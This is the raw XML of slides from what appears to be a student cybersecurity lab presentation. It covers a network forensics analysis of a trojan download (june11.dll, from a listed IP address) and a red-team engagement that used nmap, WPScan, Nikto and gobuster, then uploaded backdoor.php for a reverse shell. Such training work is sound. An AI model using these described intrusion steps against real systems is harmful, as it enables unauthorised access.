                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>“empty.gif?ss&amp;ss1img” shows the desktop background </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>image</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="457200" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="1000"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="2784" name="Google Shape;2784;p190"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1567975" y="7182700"/>
            <a:ext cx="7612124" cy="5337152"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="2785" name="Google Shape;2785;p190"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="13763575" y="7182700"/>
            <a:ext cx="8054651" cy="5337150"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="2786" name="Google Shape;2786;p190"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId5">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1567975" y="5500500"/>
            <a:ext cx="21618674" cy="972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191"/>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92" name="Google Shape;2792;p19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1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Downloading </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Malware (June11.dll)</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2799" name="Google Shape;2799;p19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800" name="Google Shape;2800;p1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01" name="Google Shape;2801;p192"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="2" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="475" y="3424675"/>
            <a:ext cx="10775100" cy="94590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chemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="3700"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>We observed a malware download, using TCP and HTTP protocols.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They were browsing youtube.com</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-463550" lvl="0" marL="457200" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="1000"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="3700"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>june11.dll is name of the malicious file downloaded. This file was a trojan and commonly effects windows machines. </a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="2802" name="Google Shape;2802;p192"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="10775575" y="3154900"/>
            <a:ext cx="12562675" cy="8736249"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="2803" name="Google Shape;2803;p192"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1191025" y="8166350"/>
            <a:ext cx="9157900" cy="3724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lt1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Downloading Malware (June11.dll)</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:schemeClr val="lt1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2810" name="Google Shape;2810;p193"/>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811" name="Google Shape;2811;p1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12" name="Google Shape;2812;p193"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="2" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="475" y="3424675"/>
            <a:ext cx="24377700" cy="94590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chemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="3700"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>What, specifically, was the user doing? </a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-463550" lvl="1" marL="914400" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="3700"/>
              <a:buChar char="○"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>They were exploring Youtube.com</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Which site were they browsing? </a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-463550" lvl="1" marL="914400" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="3700"/>
              <a:buChar char="○"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>They were browsing 205.185.125.104 when they downloaded the dll.  See screenshot below that there is a “Deceptive Site Ahead” alert when trying to access this address.</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1000"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="2813" name="Google Shape;2813;p193"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6149550" y="7232175"/>
            <a:ext cx="9441900" cy="50356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1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Setting up an AD Network and Domain Controller</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2820" name="Google Shape;2820;p1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821" name="Google Shape;2821;p1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22" name="Google Shape;2822;p194"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="2" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="475" y="3424675"/>
            <a:ext cx="24377700" cy="94590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chemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="3700"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>frank-n-ted.com webserver was created on the corporate network.</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0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr i="1">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="1000"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="2823" name="Google Shape;2823;p194"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2336050" y="4442600"/>
            <a:ext cx="14121950" cy="5884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1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4800">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t> Other Interesting Files</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2830" name="Google Shape;2830;p19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Family.jpg</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2831" name="Google Shape;2831;p1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32" name="Google Shape;2832;p195"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="2" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="475" y="3424675"/>
            <a:ext cx="24377700" cy="94590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rPr lang="en-US"/>
              <a:t>There were many empty.gif files, as well as the “family” file from our activity.  We did not have the passphrase for it.</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="2833" name="Google Shape;2833;p195"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="5275582" y="4638675"/>
            <a:ext cx="10137474" cy="6977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196"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="731375" y="4311450"/>
            <a:ext cx="22914900" cy="50931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sz="25000">
                <a:latin typeface="Pacifico"/>
                <a:ea typeface="Pacifico"/>
                <a:cs typeface="Pacifico"/>
                <a:sym typeface="Pacifico"/>
              </a:rPr>
              <a:t>Any Questions?</a:t>
            </a:r>
            <a:endParaRPr sz="25000">
              <a:latin typeface="Pacifico"/>
              <a:ea typeface="Pacifico"/>
              <a:cs typeface="Pacifico"/>
              <a:sym typeface="Pacifico"/>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39" name="Google Shape;2839;p19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2</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2394" name="Google Shape;2394;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5" name="Google Shape;2395;p1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96" name="Google Shape;2396;p144"/>
          <p:cNvGraphicFramePr/>
          <p:nvPr/>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="1191013" y="3624475"/>
          <a:ext cx="3000000" cy="3000000"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr>
                <a:noFill/>
                <a:tableStyleId>{0D491178-DE92-48F7-B58E-0A37C71B41A1}</a:tableStyleId>
              </a:tblPr>
              <a:tblGrid>
                <a:gridCol w="7331875"/>
                <a:gridCol w="7331875"/>
                <a:gridCol w="7331875"/>
              </a:tblGrid>
              <a:tr h="1786625">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c>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="ctr">
                        <a:spcBef>
                          <a:spcPts val="100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660000"/>
                    </a:solidFill>
                  </a:tcPr>
                </a:tc>
              </a:tr>
              <a:tr h="2374600">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="ctr">
                        <a:lnSpc>
                          <a:spcPct val="115000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="3600">
                          <a:solidFill>
                            <a:schemeClr val="dk1"/>
                          </a:solidFill>
                          <a:latin typeface="Roboto"/>
                          <a:ea typeface="Roboto"/>
                          <a:cs typeface="Roboto"/>
                          <a:sym typeface="Roboto"/>
                        </a:rPr>
                        <a:t>Unrestricted File Upload</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="3600">
                          <a:solidFill>
                            <a:schemeClr val="dk1"/>
                          </a:solidFill>
                          <a:latin typeface="Roboto"/>
                          <a:ea typeface="Roboto"/>
                          <a:cs typeface="Roboto"/>
                          <a:sym typeface="Roboto"/>
                        </a:rPr>
                        <a:t> </a:t>
                      </a:r>
                      <a:endParaRPr sz="3600">
                        <a:solidFill>
                          <a:schemeClr val="dk1"/>
                        </a:solidFill>
                        <a:latin typeface="Roboto"/>
                        <a:ea typeface="Roboto"/>
                        <a:cs typeface="Roboto"/>
                        <a:sym typeface="Roboto"/>
                      </a:endParaRPr>
                    </a:p>
                    <a:p>
                      <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="ctr">
                        <a:spcBef>
                          <a:spcPts val="1200"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>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3600">
                          <a:solidFill>
                            <a:schemeClr val="dk1"/>
                          </a:solidFill>
                          <a:latin typeface="Roboto"/>
                          <a:ea typeface="Roboto"/>
                          <a:cs typeface="Roboto"/>
                          <a:sym typeface="Roboto"/>
                        </a:rPr>
                        <a:t>U</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="3600">
                          <a:solidFill>
                            <a:schemeClr val="dk1"/>
                          </a:solidFill>
                          <a:latin typeface="Roboto"/>
                          <a:ea typeface="Roboto"/>
                          <a:cs typeface="Roboto"/>
                          <a:sym typeface="Roboto"/>
                        </a:rPr>
                        <a:t>ploaded backdoor.php to the system</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="3600">
                          <a:solidFill>
                            <a:schemeClr val="dk1"/>
                          </a:solidFill>
                          <a:latin typeface="Roboto"/>
                          <a:ea typeface="Roboto"/>
                          <a:cs typeface="Roboto"/>
                          <a:sym typeface="Roboto"/>
                        </a:rPr>
                        <a:t> </a:t>
                      </a:r>
                      <a:endParaRPr b="1"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Allowed Red Team to create the backdoor to create command for the reverse shell back into our kali machine. </a:t>
                      </a:r>
                      <a:endParaRPr b="1"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276975">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U</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="3600">
                          <a:solidFill>
                            <a:schemeClr val="dk1"/>
                          </a:solidFill>
                          <a:latin typeface="Roboto"/>
                          <a:ea typeface="Roboto"/>
                          <a:cs typeface="Roboto"/>
                          <a:sym typeface="Roboto"/>
                        </a:rPr>
                        <a:t>npatched versions of WordPress and Apache</a:t>
                      </a:r>
                      <a:endParaRPr sz="3600">
                        <a:solidFill>
                          <a:schemeClr val="dk1"/>
                        </a:solidFill>
                        <a:latin typeface="Roboto"/>
                        <a:ea typeface="Roboto"/>
                        <a:cs typeface="Roboto"/>
                        <a:sym typeface="Roboto"/>
                      </a:endParaRPr>
                    </a:p>
                    <a:p>
                      <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="ctr">
                        <a:spcBef>
                          <a:spcPts val="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L</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="3600">
                          <a:solidFill>
                            <a:schemeClr val="dk1"/>
                          </a:solidFill>
                          <a:latin typeface="Roboto"/>
                          <a:ea typeface="Roboto"/>
                          <a:cs typeface="Roboto"/>
                          <a:sym typeface="Roboto"/>
                        </a:rPr>
                        <a:t>acked the latest security updates which indicated lack of care on the part of the administrator</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Encouraged the Red Team to utilize basic tools to exploit the site due to potential for success.</a:t>
                      </a:r>
                      <a:endParaRPr sz="36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2601850">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Recon using WPScan indicated a dated Version of WordPress</a:t>
                      </a:r>
                      <a:endParaRPr sz="3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 </a:t>
                      </a:r>
                      <a:endParaRPr sz="3600">
                        <a:solidFill>
                          <a:schemeClr val="dk1"/>
                        </a:solidFill>
                        <a:latin typeface="Roboto"/>
                        <a:ea typeface="Roboto"/>
                        <a:cs typeface="Roboto"/>
                        <a:sym typeface="Roboto"/>
                      </a:endParaRPr>
                    </a:p>
                    <a:p>
                      <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="ctr">
                        <a:spcBef>
                          <a:spcPts val="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Used Nikto to enumerate the site </a:t>
                      </a:r>
                      <a:br>
                        <a:rPr lang="en-US" sz="3600">
                          <a:solidFill>
                            <a:schemeClr val="dk1"/>
                          </a:solidFill>
                          <a:latin typeface="Roboto"/>
                          <a:ea typeface="Roboto"/>
                          <a:cs typeface="Roboto"/>
                          <a:sym typeface="Roboto"/>
                        </a:rPr>
                      </a:br>
                      <a:r>
                        <a:rPr lang="en-US" sz="3600">
                          <a:solidFill>
                            <a:schemeClr val="dk1"/>
                          </a:solidFill>
                          <a:latin typeface="Roboto"/>
                          <a:ea typeface="Roboto"/>
                          <a:cs typeface="Roboto"/>
                          <a:sym typeface="Roboto"/>
                        </a:rPr>
                        <a:t>at 192.168.1.115 and gobuster to detail the directories</a:t>
                      </a:r>
                      <a:endParaRPr sz="3600">
                        <a:latin typeface="Caveat"/>
                        <a:ea typeface="Caveat"/>
                        <a:cs typeface="Caveat"/>
                        <a:sym typeface="Caveat"/>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Roboto"/>
                          <a:ea typeface="Roboto"/>
                          <a:cs typeface="Roboto"/>
                          <a:sym typeface="Roboto"/>
                        </a:rPr>
                        <a:t>E</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="3600">
                          <a:solidFill>
                            <a:schemeClr val="dk1"/>
                          </a:solidFill>
                          <a:latin typeface="Roboto"/>
                          <a:ea typeface="Roboto"/>
                          <a:cs typeface="Roboto"/>
                          <a:sym typeface="Roboto"/>
                        </a:rPr>
                        <a:t>xposed potential vulnerabilities of the site at 192.168.1.115 encouraged Red Team to proceed</a:t>
                      </a:r>
                      <a:endParaRPr sz="3600">
                        <a:solidFill>
                          <a:schemeClr val="dk1"/>
                        </a:solidFill>
                        <a:latin typeface="Roboto"/>
                        <a:ea typeface="Roboto"/>
                        <a:cs typeface="Roboto"/>
                        <a:sym typeface="Roboto"/>
                      </a:endParaRPr>
                    </a:p>
                    <a:p>
                      <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="ctr">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:t/>
                      </a:r>
                      <a:endParaRPr sz="2500">
                        <a:latin typeface="Roboto"/>
                        <a:ea typeface="Roboto"/>
                        <a:cs typeface="Roboto"/>
                        <a:sym typeface="Roboto"/>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pic>
        <p:nvPicPr>
          <p:cNvPr id="2401" name="Google Shape;2401;p1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02" name="Google Shape;2402;p14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03" name="Google Shape;2403;p14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Security Misconfiguration</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2409" name="Google Shape;2409;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0" name="Google Shape;2410;p146"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="3" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="703375" y="2295400"/>
            <a:ext cx="22942800" cy="2584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800">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Tools and Processes</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="4800">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-508000" lvl="0" marL="914400" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="1000"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="4400"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="4400">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Utilized NMAP scan  (nmap -sV -O 192.168.1.110) to uncover open ports, services and operating system</a:t>
            </a:r>
            <a:endParaRPr sz="4400">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="2411" name="Google Shape;2411;p146"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="1361" l="0" r="0" t="0"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="10955292" y="5752400"/>
            <a:ext cx="12231358" cy="6902150"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2412" name="Google Shape;2412;p146"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="3" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="703375" y="4956400"/>
            <a:ext cx="10239300" cy="76689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This gave us available ports that are open, revealing that port 22 was accessible</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wpscan was used to then show users</a:t>
            </a:r>
            <a:endParaRPr sz="4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Security Misconfiguration (WPScan)</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2418" name="Google Shape;2418;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419" name="Google Shape;2419;p147"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1191025" y="2177200"/>
            <a:ext cx="11843525" cy="7497100"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="2420" name="Google Shape;2420;p147"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="9330325" y="3156325"/>
            <a:ext cx="13856326" cy="9526250"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2421" name="Google Shape;2421;p147"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9480800" y="9932275"/>
            <a:ext cx="8341500" cy="20853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7"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7223475" y="10557300"/>
            <a:ext cx="1977900" cy="10749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